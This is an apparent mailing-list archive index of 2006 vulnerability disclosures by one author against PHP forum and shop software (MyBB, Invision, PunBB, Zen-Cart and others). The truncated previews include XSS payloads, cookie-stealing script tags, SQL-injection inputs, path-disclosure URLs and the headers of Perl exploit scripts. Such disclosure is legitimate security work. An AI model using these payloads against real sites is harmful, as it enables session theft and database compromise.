Zen-Cart 1.3.0.2 Full Path Disclosure

2006-06-30 Thread o . y . 6
Zen-Cart 1.3.0.2 En: Zen-Cart .. E-commerce PHP Program - This Bug Can Tell U Where The Program @ Server Ar: Zen Cart .. a commerce program

MyBB 1.1.2 New XSS

2006-06-07 Thread o . y . 6
// MyBB 1.1.2 New XSS File :- private.php Ver. :- $do = $mybb->input['do']; Line :- 260 Action :- Preview HTTP Proof :-

Invision Community Blog .. Bugs

2006-05-05 Thread o . y . 6
[LEFT] Invision Community Blog .. Bugs SQL Injection :- Filename :- mod.php Function name :- do_mmod() The $ids Unfilter Input By Intval As Array :) So We Can Do SQL Injection -- * Arabic * [/LEFT] [RIGHT] The variable $ids is not filtered through the intval function, and it is in the form of an array ..

SaPHPLesson 3.0 Multbugs

2006-05-05 Thread o . y . 6
SaPHPLesson 3.0 Multbugs By :-- D3vil-0x1 | Devil-00 --: 1- Unfilter array Filename:- show.php Line:- 102 [code] $hrow[] = $Row2;[/code] Fix :- Add To Line [ 11 ] /show.php This Code :- we add the code to global to fix all unfilter

PunBB 1.2.11 Cross-Site Scripting

2006-05-04 Thread o . y . 6
PunBB 1.2.11 Cross-Site Scripting File name :- misc.php Action:- Send Email Line :- 123 [php] redirect($_POST['redirect_url'], $lang_misc['E-mail sent redirect']); [/php] The $_POST['redirect_url'] = Unfilter Input Exploit :- Send POST Request [code] GET

Invision Gallery 2.0.6 ( SQL Injection )

2006-05-02 Thread o . y . 6
[left] Invision Gallery 2.0.6 ( SQL Injection ) File :- modules/gallery/post.php Line :- 943 Bug By :- Devil-00 * Welcome Back ( Security4arab ) * Arabian Security WebSites www.s4a.cc www.securitygurus.net

Invision Power Board v2.1.5 Remote SQL Injection

2006-05-01 Thread o . y . 6
Invision Power Board v2.1.5 Remote SQL Injection Filename:- func_mod.php Functionname:- post_delete() Lines :- 89 To 209 Bug Found By :- Devil-00 Greetz :- Rock Master ^ Hackers Pal ^ n0m4rcy ^

OpenBB 1.0.8 Full Path Disclosure

2006-05-01 Thread o . y . 6
OpenBB 1.0.8 Full Path Disclosure Bug Found By :- Devil-00 Gr33tz :- Www.securitygurus.neT Rock Master Hackers Pal n0m3rcy -= 1-2 =- Full Path Disclosure Exploits :-

MyBB 1.1.1 Local SQL Injections

2006-04-27 Thread o . y . 6
MyBB Local SQL Injections .. [ This Local Injections Only For Admin ] * 1 * [code] adminfunctions.php , line 730 $db->query("INSERT INTO ".TABLE_PREFIX."adminlog (uid,dateline,scriptname,action,querystring,ipaddress) VALUES

WWWThread RC 3 MultBugs

2006-04-19 Thread o . y . 6
[code]// --- WWWThread RC 3 MultBugs --- // * D3vil-0x1 | Devil-00 * www.securitygurus.net * Gr33tz - HACKERS PAL | n0m3rcy | - All Others i forgot them :)) //-//

FlexBB 0.5.5 Bypass Exploit

2006-04-17 Thread o . y . 6
#!/usr/bin/perl -w # FlexBB = 0.5.5 (/inc/start.php _COOKIE) Remote SQL ByPass Exploit , Perl C0d3 # # Milw0rm ID :- #http://www.milw0rm.com/auth.php?id=1539 # D3vil-0x1 | Devil-00 BlackHat :) # # DONT FORGET TO DO YOUR CONFIG !! # DONT FORGET TO DO YOUR CONFIG !! # DONT

MyBB 1.10 New XSS ' member.php '

2006-04-13 Thread o . y . 6
//-- MyBB 1.10 New XSS ' member.php ' --// Webattack :- 1- Logout 2- Open Firefox 3- Use [ Live HTTP Headers ] 4- Do Register 5- Agree It 6- Edit Cookies By Live HTTP Headers 7- Add This Cookies :D mybb[referrer]=/inputbHTML/binput; //-- FixIT --//

MyBB 1.10 New CrossSiteScripting ' member.php '

2006-04-13 Thread o . y . 6
//-- MyBB 1.10 New CrossSiteScripting ' member.php ' --// Webattack :- /mybb/member.php?action=do_login&username=[usrname]&password=[pass]&url=<script>alert(1);</script> //-- FixIT --// Open member.php GoTo Line :- 1030 .. if($mybb->input['url']) {

MyBB 1.10 'newthread.php' CrossSiteScripting

2006-04-10 Thread o . y . 6
MyBB 1.10 'newthread.php' CrossSiteScripting [ Devil-00 | D3vil-0x1 ] [*] Conditions [*] 1- your unregistered user 2- you have permissions to do newthread [---] do newthread with this username :- <script>alert(document.cookie);</script>D3vil-0x1 Then Preview it ;)

MyBB 1.10 New CrossSiteScripting

2006-04-03 Thread o . y . 6
MyBB 1.10 CrossSiteScripting File :- inc/functions_post.php BugTraqer :- Devil-00 [EMAIL PROTECTED] we can do attack by some unfilter tags :- Post New Thread Or New Replay With This Code :D And Try To Move The Mouse Over The Email ;) [code]

ArabPortal 2.0 Stable CrossSiteScripting

2006-03-28 Thread o . y . 6
ArabPortal 2.0 Stable .. The Best Arabian Portal Forums System * The Bug Is XSS * [code] online.php?title=D3vil-0x1/titleXSSCODE/XSS download.php?action=byuseruserid=1title=D3vil-0x1/titleXSSCODE/XSS [/code] [center] ^^ Secumod 0.1 Anti-XSS SQL Injection ^^ [ Get It For Free !! Only 15$ And

MyBB 1.10 Full Path Disclosure

2006-03-17 Thread o . y . 6
D3vil-0x1 | Devil-00 New MyBB bug that will give you the ' Full Path Disclosure ' at vic. server MyBB 1.10 .. New Bugs 1- Full Path Disclosure = mybb/polls.php?action=vote&pid=[PID]&option[]=null - Where PID Poll ID

MyBB 1.04 Perl Exploit

2006-03-03 Thread o . y . 6
#!/usr/bin/perl -w # MyBB = 1.04 (misc.php COMMA) Remote SQL Injection Exploit 2 , Perl C0d3 # # Milw0rm ID :- # http://www.milw0rm.com/auth.php?id=1539 # D3vil-0x1 | Devil-00 BlackHat :) # # DONT FORGET TO DO YOUR CONFIG !! # DONT FORGET TO DO YOUR CONFIG !! # DONT FORGET

MyBB 1.0.4 New SQL Injection

2006-03-02 Thread o . y . 6
MyBB 1.0.4 New SQL Injection D3vil-0x1 File :- search.php 580 to 592 /* _START_ */ if($mybb->input['forums'] != "all") { if(!is_array($mybb->input['forums'])) -- We Break It By forums[]=-1 {

MyBB 1.3 NewSQL Injection

2006-02-28 Thread o . y . 6
MyBB New SQL Injection D3vil-0x1 Devil-00 Milw0rm ID :- http://www.milw0rm.com/auth.php?id=1320 The Inf.File :- misc.php Linez :- [code] $buddies = $mybb->user['buddylist']; $namesarray = explode(",",$buddies); if(is_array($namesarray)) {

MyBB 1.2 usercp2.php [ $url ] CrossSiteScripting ( XSS )

2006-01-30 Thread o . y . 6
Invalid characters removed from From: [EMAIL PROTECTED], |@securityfocus.com, ## MyBB 1.02 usercp2.php XSS ##--## ## Devil-00 D3vil-0x1 - Attacking MyBB :)## ## ## ## [EMAIL PROTECTED]## ## ##

MyBB 1.2 Local File Inclusion

2006-01-30 Thread o . y . 6
Invalid characters removed from From: [EMAIL PROTECTED], |@securityfocus.com, D3vil-0x1 MyBB Bug ### ## Local File Inclusion ## ## MyBB 1.2 - Admin Can Include Local File :) ## File :- admin/plugins.php Line :- 51

Re: MyBB 1.0.2 SQL injection in usercp.php

2006-01-16 Thread o . y . 6
Hiz .. look at phpMyAdmin or your database threadmode After usergroup .. then you can't edit usergroup to get super access to any user you want UPDATE Query :- ','','','')/* Only You Can Edit showsigs showavatars showquickreply ppp tpp daysprune